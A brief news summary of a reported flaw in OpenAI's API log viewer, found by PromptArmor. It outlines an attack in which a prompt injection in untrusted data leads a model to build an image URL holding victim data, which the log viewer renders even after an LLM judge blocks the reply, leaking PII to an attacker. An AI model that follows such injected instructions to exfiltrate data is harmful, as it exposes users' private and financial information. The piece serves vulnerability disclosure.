Security researchers at PromptArmor discovered a vulnerability in OpenAI's API log viewer that allows data exfiltration even when applications block malicious outputs. The flaw lies in insecure Markdown rendering, which exposes sensitive data from apps and agents built on the OpenAI Platform. This affects the default 'responses' API, used by many vendors.

The attack chain involves a prompt injection in untrusted data, which generates a malicious image URL containing victim data. While an app-level defense like an LLM judge blocks the response, the OpenAI log viewer still renders it, triggering a request to the attacker's server. This exposes PII and financial data.

OpenAI was disclosed the issue but closed the report as 'Not Applicable' after four follow-ups. The vulnerability also impacts preview environments like Agent Builder and the Starter ChatKit app. Developers using OpenAI as a subprocessor are likely exposed, requiring external precautions since the platform itself offers no patch.